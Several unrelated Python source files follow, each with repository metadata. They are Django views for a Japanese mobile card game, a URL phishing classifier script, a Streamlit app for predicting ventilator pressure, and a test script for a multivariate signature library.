player.set_latest_news(news_id)
if before_news_id < news_id:
Information.set_notification(player.pk)
player.set_latest_news(news_id)
#補償アイテムがあるか
if not informations._get_compensation(player.pk):
get_player_compensations(player)
information = informations.get_messages(player.pk, request.is_smartphone)
for msg in Event(request).information():
information.append({'name': msg.title, 'url': msg.url})
# 自己紹介文章
mycomment = get_profile_comment(player)
banner_list = get_active_arrange_list()
banners_top = get_banner_tag(ArrangeBase.MYPAGE_TOP, banner_list)
banners_mid = get_banner_tag(ArrangeBase.MYPAGE_MIDDLE, banner_list)
banners_btm = get_banner_tag(ArrangeBase.MYPAGE_BOTTOM, banner_list)
banners_slide = get_banner_tag(ArrangeBase.MYPAGE_SLIDE, banner_list)
''' マイベッドのカード選出 '''
show_order = (1, 2, 3, 4, 5)
if not request.is_smartphone:
show_order = (4, 2, 1, 3, 5)
deck_list = get_deck_all(player)
player_cards = player.cards_cache()
mapper = {
1: get_player_attack_front_list,
2: get_player_defense_front_list,
}
leadercard = player.leader_player_card()
# 表示させるカードはコスト関係無いからコスト999固定値
# マイベットなので5人固定なのです
#show_card_list, _, _, _ = mapper[random.choice([1, 2])](player, 999, 5, player_cards)
#show_card_list = [x[1] for x in show_card_list]
show_card_list = []
show_card_list.append(leadercard)
# 表示するカードから、コメントを表示するカードを選出
comment_index = random.randint(1, len(show_card_list))
greet_card = show_card_list[comment_index - 1]
comment_index = show_order.index(comment_index) + 1
if not request.is_smartphone:
show_card_list += [DummyCard() for i in range(5 - len(show_card_list))] # カードが5枚以下の場合、ダミー画像を差し込む
show_card_list = [show_card_list[i - 1] for i in show_order] # カードを並び替える
# 自己紹介URL
if settings.IS_COLOPL:
myprofile_tag = containerdata['app_url'] % {"app_id": settings.APP_ID, "userid": player.pk}
elif settings.IS_AMEBA:
profile_url = "http://" + settings.SITE_DOMAIN + reverse("profile_show", args=[player.pk])
myprofile_tag_sp = '<a href="{}">マイベッド</a>'.format(profile_url)
myprofile_tag = myprofile_tag_sp
else:
profile_url = urllib.quote("http://" + settings.SITE_DOMAIN + reverse("profile_show", args=[player.pk]), "~")
fp_url = containerdata['app_url'] % {"app_id": settings.APP_ID}
fp_url += '?guid=ON&url=' + profile_url
if settings.IS_GREE:
if settings.OPENSOCIAL_SANDBOX:
platform_domain = 'pf-sb.gree.net/{}'.format(settings.APP_ID)
else:
platform_domain = 'pf.gree.net/{}'.format(settings.APP_ID)
profile_url_sp = urllib.quote("http://" + settings.SITE_DOMAIN_SP + reverse("profile_show", args=[player.pk]), "~")
sp_url = "http://" + platform_domain
sp_url += "?url=" + profile_url_sp
else:
sp_url = containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
sp_url += "?url=" + profile_url
if settings.IS_DGAME:
if settings.OPENSOCIAL_SANDBOX:
query = '?apid=%s&url=' % settings.APP_ID
sp_url = sp_url.replace('?url=', query)
fp_query = '?apid=%s&guid=ON&url=' % settings.APP_ID
fp_url = fp_url.replace('?guid=ON&url=', fp_query)
myprofile_tag_fp = '<dcon title="マイベッド(ケータイはこちら)" href="{}"/>'.format(fp_url)
myprofile_tag_sp = '<dcon title="マイベッド(スマートフォンはこちら)" href="{}"/>'.format(sp_url)
else:
myprofile_tag_fp = '<a href="{}">マイベッド(ケータイはこちら)</a>'.format(fp_url)
myprofile_tag_sp = '<a href="{}">マイベッド(スマートフォンはこちら)</a>'.format(sp_url)
myprofile_tag = myprofile_tag_sp + myprofile_tag_fp
#デッキの攻撃力、防御力
#(ここの処理は非常に重い。スマホでしか使用していないので、ガラケーでは計算しない。)
if request.is_smartphone:
front, back, _, _ = get_battle_member_list(player, BATTLE_SIDE_ATTACK, is_max=True, player_cards=player_cards, deck_list=deck_list)
attack_battle_power = sum([pc.attack() for pc in (front + back)])
front, back, _, _ = get_battle_member_list(player, BATTLE_SIDE_DEFENSE, is_max=True, player_cards=player_cards, deck_list=deck_list)
defense_battle_power = sum([pc.defense() for pc in (front + back)])
else:
# ガラケーのHTML側では利用していないはずだが、念のためダミーを定義
attack_battle_power = 1000
defense_battle_power = 1000
event_callback = Event(request)
event = event_callback.get_current_event()
event_callback.update_rescue_info()
info_msg = event_callback.get_group_match_info(player)
if info_msg == player:
# 返り値が同じならNoneに
info_msg = None
navi_message = get_navi_message(player, request.is_smartphone)
event_boss_info = event_callback.get_event_boss_info()
is_rescue = None
if event_boss_info:
is_rescue = event_boss_info.get('is_rescue', None)
event_navi_message = select_navi_message(player, event, is_rescue, info_msg)
limited_shop_list = get_limited_shop_list()
limited_shop = None
if limited_shop_list:
limited_shop = limited_shop_list[0]
campaign = get_active_buildup_campaign(player)
is_bookmark_close = player.get_bookmark_close
ad_params = {}
if settings.IS_GREE:
ad_params = _get_advertise_params(request)
archive_bonus_init_kvs = player.get_kvs('archive_bonus')
if not archive_bonus_init_kvs.get(False):
from module.playercard.api import init_archive_or_love_max_bonus
init_archive_or_love_max_bonus(player)
archive_bonus_init_kvs.set(True)
if not event:
events = get_opening_events()
if events:
event = events[0]
if event:
event_index_viewname = 'event{}:event_common_index'.format(event.id)
else:
event_index_viewname = 'event_common_index'
# ameba用のドットマネー対応
dotmoney_stat = {}
if settings.IS_AMEBA:
if not settings.OPENSOCIAL_DEBUG:
achievement = Achievement(request)
dotmoney_stat = achievement.get_stat(player.pk)
item_box_count_stat = achievement.get_item_box_count(player.pk)
today = datetime.date.today()
expiration_date = datetime.date(today.year, today.month, 1) + relativedelta(months=1) - datetime.timedelta(days=1)
dotmoney_left_day = expiration_date - today
if item_box_count_stat and 'item_box_count' in item_box_count_stat and item_box_count_stat['item_box_count'] > 0:
information.append({'name': u'ドットマネーの交換アイテムが届いています!', 'url': reverse('gift_index')})
if dotmoney_stat:
if 'amebapoint_center_text' in dotmoney_stat and 'amebapoint_top_url' in dotmoney_stat:
information.append({'name': u'【アメーバからのお知らせ】{}'.format(dotmoney_stat['amebapoint_center_text']), 'url': dotmoney_stat['amebapoint_top_url']})
if dotmoney_left_day.days <= 7 and 'expiration_point' in dotmoney_stat:
if dotmoney_left_day.days >= 2:
dot_info_msg = u'あと{}日で'.format(dotmoney_left_day.days)
else:
dot_info_msg = u'本日'
dot_info_msg = u'{}あなたのドットマネー {}マネーが失効します'.format(dot_info_msg, intcomma(int(dotmoney_stat['expiration_point'])))
information.append({'name': u'【アメーバからのお知らせ】{}'.format(dot_info_msg), 'url': '#'})
# mobcast用のペロ対応
pero_stat = {}
if settings.IS_MOBCAST:
if not settings.OPENSOCIAL_DEBUG:
achievement = Achievement(request)
pero_stat = achievement.get_stat(player.pk)
if greet_card:
if greet_card.rarity >= 19:
mybed_card_voice = greet_card.detail.voice_url_by_id(2)
else:
mybed_card_voice = greet_card.detail.voice_url_by_id(random.choice(range(1, 15)))
ctxt = RequestContext(request, {
'player_card_front_list': show_card_list,
'friend_count': friend_count,
'battle_history_list': battle_history_list,
'bless_history_list': bless_history_list,
'notification_list': notification_list,
'notification_lists': notification_lists,
'banners_top': banners_top,
'banners_mid': banners_mid,
'banners_btm': banners_btm,
'banners_slide': banners_slide,
'mycomment': mycomment,
'information': information,
'greet_card': greet_card,
'idx': comment_index,
'my_guild': my_guild,
'attack_battle_power': attack_battle_power,
'defense_battle_power': defense_battle_power,
'myprofile_tag': myprofile_tag,
'campaign': campaign,
'event': event,
'event_index_viewname': event_index_viewname,
'limited_shop': limited_shop,
'guild_pet': get_current_pet(),
'is_bookmark_close': is_bookmark_close,
'ad_params': ad_params,
'navi_message': navi_message,
'event_navi_message': event_navi_message,
'group_match_info': info_msg,
'event_boss_info': event_boss_info,
'enable_dungeon': Dungeon.get_dungeon_list(),
'dotmoney_stat': dotmoney_stat,
'pero_stat': pero_stat,
'mybed_card_voice': mybed_card_voice,
})
response = render_to_response('root/index.html', ctxt)
return response
@require_player
def mood_callback(request):
player = request.player
#cache = _get_mood_send_limit(player)
#if cache.get() == 0:
kvs = player.get_kvs('fgacha_302')
if not kvs.get():
from module.gift.api import npc_give_gift
npc_give_gift(player.pk, settings.ENTITY_TYPE_ITEM, 206, 1, u'{}送信による報酬です。'.format(T.SNS_SAY))
#cache.set(1)
kvs.set(True)
return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
def _get_mood_send_limit(player):
return get_cache_limit_of_day("gashapon_sendmood1224:" + player.pk, 0)
def ad_program(player):
"""
GREE広告3種の「成果タグ」
"""
import hashlib
ad_program_key = None
if player:
temp = hashlib.md5('%s%s' % (player.pk, T.AD_PROGRAM_KEY)).hexdigest()
ad_program_key = '%s_%s' % (player.pk, temp)
return ad_program_key
def _generate_growth_list(growth):
'''
良い感じのステップの配列をつくる
'''
result = []
for v in range(growth + 1):
if v <= 0:
continue
if v <= 10:
result.append(v)
elif v % 5 == 0:
result.append(v)
if growth > 10 and growth % 5 != 0:
result.append(growth)
return result
@require_player
def root_growth_index(request):
player = request.player
growth = player.growth
## growthをパースする
growth_list = _generate_growth_list(growth)
event = Event(request).get_current_event()
event_banner = u''
if event:
event_banner = Event(request).get_encount_banner_callback() or u''
ctxt = RequestContext(request, {
'growth_list': growth_list,
'event_banner': event_banner,
})
return render_to_response('root/growth.html', ctxt)
@require_player
def root_end_event_list(request):
ctxt = RequestContext(request, {
'end_event_list': get_ending_events(),
})
return render_to_response('root/end_event_list.html', ctxt)
@require_player
def root_zoning_index(request):
ctxt = RequestContext(request, {})
return render_to_response('root/zoning.html', ctxt)
@require_player
def root_growth_execution(request, category=0):
player = request.player
category = category
number = request.POST.get('growth_val', 0)
category = int(category)
number = int(number)
log_do_growth(player, number, category)
growth_map = {
1: lambda number: player.growth_vitality(number),
2: lambda number: player.growth_attack(number),
3: lambda number: player.growth_defense(number),
}
growth_map[category](number)
player.save(force_update=True)
if player.growth == 0:
Information.reset_growth(player.pk)
return HttpResponseOpensocialRedirect(reverse('root_growth_result', args=[category, number]))
@require_player
def root_growth_result(request, category, number):
player = request.player
growth = player.growth
if not growth:
# 無い場合は呼び出し元に戻る
return_url = request.session.get('GROWTH_RETURN_URL')
if return_url:
request.session['GROWTH_RETURN_URL'] = None
return HttpResponseOpensocialRedirect(return_url)
## growthをパースする
growth_list = _generate_growth_list(growth)
event = Event(request).get_current_event()
event_banner = u''
if event:
event_banner = Event(request).get_encount_banner_callback() or u''
ctxt = RequestContext(request, {
'category': int(category),
'number': number,
'growth_list': growth_list,
'event_banner': event_banner,
})
return render_to_response('root/growth.html', ctxt)
@require_player
def root_cooperate(request):
ctxt = RequestContext(request, {
})
return render_to_response('root/cooperate.html', ctxt)
@require_player
def root_fleshman_list(request):
player = request.player
player_list = get_fleshman(player.pk, 10)
ctxt = RequestContext(request, {
'player_list': player_list,
})
return render_to_response('root/fleshman_list.html', ctxt)
def _root_index_animation(request, player):
flash_manager = PromotionFlashManager(player)
# 登録キャンペーン
regist_campaign = get_active_regist_campaign(player)
if regist_campaign and flash_manager.can_show_movie():
flag = acquire_regist_campaign(player, regist_campaign)
if flag:
return HttpResponseOpensocialRedirect(reverse('regist_campaign_production', args=[regist_campaign.pk]))
# カムバックキャンペーン
if player.get_last_login_at():
comebackbonus = get_valid_comebackbonus()
if comebackbonus:
acquire_comebackbonus_id = acquire_comebackbonus(request, comebackbonus)
if acquire_comebackbonus_id:
if comebackbonus.flag_is_continuous_campaign():
return HttpResponseOpensocialRedirect(reverse('comeback_login_production'))
return HttpResponseOpensocialRedirect(reverse('comebackbonus_index', args=[]), request)
advent_box = get_active_advent_box()
if advent_box and flash_manager.can_show_movie():
advent_box_history = getattr(request, 'login_bonus_history', None) or get_latest_advent_box_history(player)
advent_box, position = acquire_advent_box(player, advent_box_history)
if advent_box and position:
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('advent_box_production', args=[advent_box.pk]))
login_stamp = get_extra_or_active_login_stamp(player)
if login_stamp and flash_manager.can_show_movie():
login_stamp_history = getattr(request, 'login_bonus_history', None)
if login_stamp_history is None or isinstance(login_stamp_history, PlayerAdventBoxRewardHistory):
login_stamp_history = get_latest_login_stamp_history(player, login_stamp)
try:
login_stamp, position, step, step_count = acquire_login_stamp(player, login_stamp_history, login_stamp)
except LoginStamp.ContinuationException:
return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
if login_stamp:
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('login_stamp_production', args=[login_stamp.pk, position, step, step_count]))
# 継続ボーナス
if check_continuance_bonus(player) and flash_manager.can_show_movie():
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('continuance_bonus_production', args=[]))
# ログインボーナス
if flash_manager.can_show_movie():
login_bonus_list = get_valid_loginbonus_list()
login_bonus_list = acquire_login_bonus(player, login_bonus_list, request)
if login_bonus_list:
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('login_bonus_production', args=[login_bonus_list[0].group]))
if flash_manager.can_show_movie() and mission_clear_flash_cheack(player.pk):
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('panelmission_mission_clear_execution'))
# リワードキャンペーン
continuationcampaign_list = get_valid_continuationcampaign()
continuationcampaign = [r for r in continuationcampaign_list if r.trigger_id == 1]
if continuationcampaign:
if flash_manager.can_show_movie() and check_and_do_continuationcampaign(player, continuationcampaign[0]):
flash_manager.count_up()
return HttpResponseOpensocialRedirect(reverse('continuationcampaign_production', args=[]))
# 無料ガチャ系
time_free_gashapon = player_time_free_gashapon(request)
free_gashapons = [player_one_time_per_day_gashapon(player), time_free_gashapon]
is_gashapon_enable = False
for gashapon in free_gashapons:
if gashapon and gashapon.is_enable():
Information.set_normal_gacha(player.pk)
is_gashapon_enable = True
break
if not is_gashapon_enable:
Information.reset_normal_gacha(player.pk)
return None
def auth_device_error(request):
'''
非対応端末エラー
'''
ctxt = RequestContext(request, {})
response = render_to_response('root/auth_device_error.html', ctxt)
response.delete_cookie('scid')
return response
def root_auth(request):
"""
iOS6対応コード
"""
import time
now = time.time()
callback_url = '/m/' if settings.OPENSOCIAL_DEBUG else containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
res = HttpResponseRedirect(callback_url)
res.set_cookie("created_at", now, max_age=2592000, path='/')
return res
def grant_strage_access(request):
"""
mixi対応
"""
callback_url = '/m/' if settings.OPENSOCIAL_DEBUG else containerdata['app_url_sp'] % {"app_id": settings.APP_ID}
ctxt = RequestContext(request, {
'callback_url': callback_url,
})
return render_to_response('root/grant_strage_access.html', ctxt)
@require_player
def bookmark_close(request):
request.player.set_bookmark_close()
ajax = AjaxHandler(request)
ajax.set_ajax_param('text', "OK")
ctxt_params = {}
#ctxt = RequestContext(request, ctxt_params)
return HttpResponse(ajax.get_ajax_param(ctxt_params), mimetype='text/json')
@require_player
def root_anim_invitation_introduce(request):
return render_swf(request, 'root/invitation_introduce', reverse("invitation_index"), {})
def _get_advertise_params(request):
# とりあえず対応だよ
# 3日連続ログインしたユーザーはタグを表示する
import hashlib
player = request.player
sha256_osuser_id = hashlib.sha256(player.pk).hexdigest()
key = settings.GREEAD_LOGIN_ADVERTISEMENT + u':' + settings.GREEAD_LOGIN_CAMPAIGN_ID + u':' + str(sha256_osuser_id) + u':' + settings.GREEAD_LOGIN_SITE_KEY
digest = hashlib.sha256(key).hexdigest()
is_staging = settings.OPENSOCIAL_SANDBOX
is_product = not is_staging and not settings.DEBUG
kvs = player.get_kvs('gree_ad_login_campaign')
if not kvs.get() and player.regist_past_day == settings.GREEAD_LOGIN_COUNT:
login_count = DailyAccessLog.objects.using("read").filter(osuser_id=player.pk).count()
if login_count >= settings.GREEAD_LOGIN_COUNT:
params = {
# 'ad_program_md5_key': ad_program(request.opensocial_viewer_id),
"sha256_osuser_id": sha256_osuser_id,
"digest": digest,
"is_product": is_product,
}
kvs.set(True)
else:
params = {}
else:
params = {}
return params
def _logging_special_users(player_id, str):
'''
特定のユーザーIDのみログ吐くよ(GREEのみ)
# あほか終わったら消せよ2017/04/27 by kyou
'''
if not settings.IS_GREE:
return
import logging
SPECIAL_USER_IDS = [
u'17023',
u'16928030',
u'6704082',
u'16163103',
]
if player_id in SPECIAL_USER_IDS:
logging.error('[SPECIAL {}] {}'.format(player_id, str))
@require_player
def dgame_api_test(request):
action_record = ActionRecord(request)
action_record.post_record(request.player.pk, 'login3days')
return HttpResponseOpensocialRedirect(reverse('mobile_root_top'))
@require_player
def xr_anim(request, page):
player = request.player
ctxt = RequestContext(request, {
'page_id': page,
})
return render_to_response('card/miyabiEffect/' + page + '/main.html', ctxt) | ntm1246/test_0527 | xr/root/views.py | views.py | py | 34,530 | python | en | code | 0 | github-code | 90 |
27454543248 | import sys
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
classifier=pickle.load(open('classifier',"rb"))
vectorizer=pickle.load(open('vectorizer',"rb"))
def check_fishing_link(input):
data=[input]
vect=vectorizer.transform(data).toarray()
my_prediction=classifier.predict(vect)
if(my_prediction=='good'):
return 0;
else:
return 1;
l=''.join(sys.argv[1:])
print(check_fishing_link(l))
| divsingh14/Phisproof | ch.py | ch.py | py | 549 | python | en | code | 0 | github-code | 90 |
40578281299 | import pandas as pd
import numpy as np
import streamlit as st
import requests
from Api_request import make_api_request_with_features, make_api_request_with_id
import time
import matplotlib.pyplot as plt
from Calculate_mae import mean_absolute_error
from matplotlib.patches import Rectangle
from streamlit_lottie import st_lottie_spinner
from streamlit_extras.stoggle import stoggle
from streamlit_card import card
#Config name of the page
st.set_page_config (page_title='Mechanical ventilation')
# ------- 1 - Title and info session ---------
#Title
st.title('Ventilation Pressure Predictor')
st.sidebar.title("Navigation")
page = st.sidebar.radio("Go to", ["Predictor", "Our Project"])
if page == "Our Project":
st.subheader("What is this project about ? 🤔")
st.write("""What do doctors do when a patient has trouble breathing?
They use a ventilator to pump oxygen into a sedated patient's lungs
via a tube in the windpipe. **Mechanical ventilation** is a clinician-intensive procedure.
Developing new methods for controlling mechanical ventilators is prohibitively
expensive💰""")
st.write(" ")
st.write("""In this project, we have **simulated** a ventilator connected to a
sedated patient's lung using **Deep Learning models**.
We will help overcome the cost barrier of developing new methods for controlling
mechanical ventilators. This will pave the way for algorithms that adapt to patients and reduce
the burden on clinicians during these novel times and beyond. **As a result, ventilator treatments
may become more widely available to help patients breathe.**""")
st.write(" ")
st.write("If you want more information, check out this [link](https://github.com/UKVeteran/Mechanical-Ventilation-Prediction/blob/7be8a38d9b6db60aff2aef91a2c664e801760299/README.md#L4)")
st.write(" ")
st.write(" ")
st.write("Contact the members of the team:")
#This markdown remove the double arrows on top right of the images
st.markdown("""
<style>
.css-6awftf {
display: none;
visibility: hidden;
}
</style>
""", unsafe_allow_html=True)
col1, col2, col3, col4 = st.columns(4, gap="small")
with col1:
image = st.image("Johar.jpg")
github_url = "https://github.com/UKVeteran"
st.markdown("<h4 style='text-align: center; color: red;'>Johar</h4>", unsafe_allow_html=True)
github_url = "https://github.com/UKVeteran"
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/jmashfaque/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col2:
image = st.image("GB_picture.jpg")
github_url = "https://github.com/Guillaume2126"
st.markdown("<h4 style='text-align: center; color: green;'>Guillaume</h4>", unsafe_allow_html=True)
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/guillaumebretel/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col3:
image = st.image("Dilara3.jpg")
github_url = "https://github.com/dilarah"
st.markdown("<h4 style='text-align: center; color: blue;'>Dilara</h4>", unsafe_allow_html=True)
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/dilarahaciali/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col4:
image = st.image("Ihap.jpg")
github_url = "https://github.com/IhapSubasi"
st.markdown("<h4 style='text-align: center; color: orange;'>Ihap</h4>", unsafe_allow_html=True)
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/mustafaihapsubasi/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
elif page=="Predictor":
#Subtitle
st.subheader('Please provide your features to have access to the prediction')
#------- 2 - Choose kind of features --------
#Title
st.info('1️⃣ Select the type of data')
#List of three choices
#TODO: help with breath ID ?
button_data_provide = st.selectbox('Pick one:', ["","As a BreathID",
"As a CSV file with all features",
"Neither"],
)
#Conditions depending of the choices of kind of features:
if button_data_provide =="Neither":
st.warning("Please collect some features and come back later to have a prediction")
#------- 4- General - Select the way to provide data ---------
#Useful function to have the gif of lungs
def load_lottieurl(url: str):
r = requests.get(url)
if r.status_code != 200:
return None
return r.json()
#-------- 4-A- If the user choose "I have a breath_id", add a text field to fill and do API call --------
if button_data_provide == "As a BreathID":
st.info('2️⃣ Please provide a BreathID') #Title
breath_ids = st.multiselect('Select up to 5 BreathID', list(range(1, 201)), max_selections=5) #Input field
predict_with_breath_id = st.button(":blue[Get prediction]") #Button to get prediction
if predict_with_breath_id:
if breath_ids:
#Waiting animation (lungs + bar)
col1, col2, col3 = st.columns([1,1,1])
lottie_json = load_lottieurl("https://lottie.host/190f6b9e-80da-496f-a5b7-7374254d7634/TF29EiWHw9.json")
with col2:
progress_text = "Operation in progress. Please wait."
my_bar = st.progress(0, text=progress_text)
for percent_complete in range(2):
with col2:
with st_lottie_spinner(lottie_json, height = 200, width = 200, key=percent_complete):
time.sleep(2.5)
my_bar.progress((percent_complete+1)*50, text=progress_text)
my_bar.empty() #Remove waiting bar
st.success('Here are your results 🔽') #Success message
#Start API call
for breath_id in breath_ids:
api_response = make_api_request_with_id(breath_id)
time_step=[ 0.0, 0.0331871509552001, 0.0663647651672363, 0.0997838973999023,
0.1331243515014648, 0.1665058135986328, 0.1999211311340332, 0.233269453048706,
0.2667148113250732, 0.3001444339752197, 0.3334481716156006, 0.3667137622833252,
0.4000871181488037, 0.4334573745727539, 0.4668083190917969, 0.5001921653747559,
0.5335805416107178, 0.5669963359832764, 0.6003098487854004, 0.6336038112640381,
0.667017936706543, 0.7003989219665527, 0.7338323593139648, 0.7672531604766846,
0.8007259368896484, 0.8341472148895264, 0.8675739765167236, 0.9009172916412354,
0.9343087673187256, 0.967742681503296, 1.0011558532714844, 1.0346879959106443,
1.0681016445159912, 1.1015379428863523, 1.1348886489868164, 1.168378829956055,
1.2017686367034912, 1.235328197479248, 1.2686767578125, 1.3019189834594729,
1.335435390472412, 1.3688392639160156, 1.4022314548492432, 1.4356489181518557,
1.4690682888031006, 1.5024497509002686, 1.5358901023864746, 1.5694541931152344,
1.602830410003662, 1.636289119720459, 1.6696226596832275, 1.7029592990875244,
1.7363479137420654, 1.7697343826293943, 1.803203582763672, 1.8365991115570068,
1.869977235794068, 1.903436183929444, 1.9368293285369875, 1.970158576965332,
2.0035817623138428, 2.0370094776153564, 2.0702223777771, 2.1036837100982666,
2.1370668411254883, 2.170450448989868, 2.203945636749268, 2.23746919631958,
2.270882368087769, 2.304311990737915, 2.3376832008361816, 2.371119737625122,
2.4044580459594727, 2.4377858638763428, 2.471191644668579, 2.504603147506714,
2.537960767745972, 2.571407556533813, 2.604744434356689, 2.638017416000366]
df_api = pd.DataFrame(api_response)
df_api["time_step"]=time_step
mae = mean_absolute_error(df_api["actual_pressure"], df_api["predicted_pressure"])
# Create graph using matplotlib
fig, ax = plt.subplots()
ax.plot(df_api["time_step"], df_api["actual_pressure"], label="Actual Pressure", color='#3c7dc2')
#ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
# set y and x label
ax.set_ylabel("Pressure")
ax.set_xlabel("Time step")
# Add legend, other and title
ax.legend(loc='upper left', bbox_to_anchor=(0.0, -0.1))
ax.grid(alpha=0.15) #Improve transparency of grid
ax.spines['top'].set_visible(False) #Remove top bar
ax.spines['right'].set_visible(False) #Remove right bar
fig.set_size_inches(10, 5) #Range 10, 5
plt.title(f"Mechanical Ventilation Prediction - Breath ID={breath_id}")
#Add MAE
ratio_max_min = df_api["actual_pressure"].max()-(df_api["actual_pressure"].min())
same_size_rectangle = ((df_api["actual_pressure"].max())-(df_api["actual_pressure"].min()))/(16.7343242500-4.853261668752088)
rectangle = Rectangle((1.53, df_api["actual_pressure"].min()+ratio_max_min*0.6), 0.5, 0.8*same_size_rectangle, fill=True, color='red', alpha=0.2)
ax.add_patch(rectangle)
plt.annotate(f'MAE* = {mae}', xy=(1.6, df_api["actual_pressure"].min()+ratio_max_min*0.615), fontsize=12, color='black')
# Add in Streamlit
st.pyplot(fig)
st.write(" ")
st.write("\* **MAE= (Mean Absolute Error)** can be used to measure how close something is from being correct. In our case, **MAE** represents the average difference between actual and predicted api_response. The smaller the better!")
st.write(" ")
else:
st.error("Please, don't forget to enter at least one breath_id")
#-------- 4-B- If the user choose "I don't have a breath_id but I have all the features", add some field to fill and do API call --------
if button_data_provide == "As a CSV file with all features":
st.info('2️⃣ Please provide your features as CSV file:') #Title
up_file = st.file_uploader("Please upload a file with at least 4 columns: 'R', 'C', 'u_in' and 'u_out'",
type=["csv"]) #Add an if condition if the file is not a csv
if up_file:
st.success("File uploaded successfully!")
get_prediction_using_csv = st.button(":blue[Get prediction]")
if get_prediction_using_csv:
#waiting animation(lungs and bar)
col1, col2, col3 = st.columns([1,1,1])
lottie_json = load_lottieurl("https://lottie.host/190f6b9e-80da-496f-a5b7-7374254d7634/TF29EiWHw9.json")
with col2:
progress_text = "Operation in progress. Please wait."
my_bar = st.progress(0, text=progress_text)
for percent_complete in range(2):
with col2:
with st_lottie_spinner(lottie_json, height = 200, width = 200, key=percent_complete):
time.sleep(2.5)
my_bar.progress((percent_complete+1)*50, text=progress_text)
my_bar.empty() #Remove waiting bar
st.success('Here are your results 🔽') #Success message
#Read csv
df = pd.read_csv(up_file)
R = df['R'].values.tolist()
C = df['C'].tolist()
u_in = df['u_in'].tolist()
u_out = df['u_out'].tolist()
api_response = make_api_request_with_features(R=R, C=C, u_in=u_in, u_out=u_out)
# will return dict(time_step = time_column, actual_pressure = actual_pressure,predicted_pressure = loaded_model.predict(X).reshape(80))
if api_response is not None:
df_api = pd.DataFrame(api_response)
mae = mean_absolute_error(df_api["actual_pressure"], df_api["predicted_pressure"])
# Create graph using matplotlib
fig, ax = plt.subplots()
ax.plot(df_api["time_step"], df_api["actual_pressure"], label="Actual Pressure", color='#3c7dc2')
ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
# set y and x label
ax.set_ylabel("Pressure")
ax.set_xlabel("Time step")
# Add legend, other and title
ax.legend(loc='upper left', bbox_to_anchor=(0.0, -0.1))
ax.grid(alpha=0.15) #Improve transparency of grid
ax.spines['top'].set_visible(False) #Remove top bar
ax.spines['right'].set_visible(False) #Remove right bar
fig.set_size_inches(10, 5) #Range 10, 5
plt.title(f"Mechanical Ventilation Prediction - Breath ID={breath_id}")
#Add MAE
ratio_max_min = df_api["actual_pressure"].max()-(df_api["actual_pressure"].min())
same_size_rectangle = ((df_api["actual_pressure"].max())-(df_api["actual_pressure"].min()))/(16.7343242500-4.853261668752088)
rectangle = Rectangle((1.53, df_api["actual_pressure"].min()+ratio_max_min*0.6), 0.5, 0.8*same_size_rectangle, fill=True, color='red', alpha=0.2)
ax.add_patch(rectangle)
plt.annotate(f'MAE* = {mae}', xy=(1.6, df_api["actual_pressure"].min()+ratio_max_min*0.615), fontsize=12, color='black')
# Add in Streamlit
st.pyplot(fig)
st.write(" ")
st.write("\* **MAE= (Mean Absolute Error)** can be used to measure how close something is from being correct. In our case, **MAE** represents the average difference between actual and predicted api_response. The smaller the better!")
st.write(" ")
else:
st.error("Problem with the API. Please provide data (R, C, u_in and u_out) with the correct format (80 rows are necessary)")
| Guillaume2126/Mechanical-Ventilation-Prediction-Front-end | Streamilit.py | Streamilit.py | py | 16,553 | python | en | code | 0 | github-code | 90 |
7449675071 | # from Generators import *
from context import cryptovinaigrette
from cryptovinaigrette import cryptovinaigrette
from datetime import datetime as dt
__RED = "\033[0;31m"
__GREEN = "\033[0;32m"
__NOCOLOR = "\033[0m"
def colored_binary(b):
if b:
return __GREEN + str(b) + __NOCOLOR
else:
return __RED + str(b) + __NOCOLOR
class args: pass
args = args()
args.v = True
myKeyObject = cryptovinaigrette.rainbowKeygen(save='./')
start = dt.now()
signature = cryptovinaigrette.rainbowKeygen.sign('cvPriv.pem', 'testFile.txt')
end = dt.now()
if args.v:
print()
print("Signed (from file) in", end - start, "seconds")
start = dt.now()
signature = cryptovinaigrette.rainbowKeygen.sign(myKeyObject.private_key, 'testFile.txt')
end = dt.now()
if args.v:
print()
print("Signed (from key object) in", end - start, "seconds")
print()
print("Checking testFile.txt")
start = dt.now()
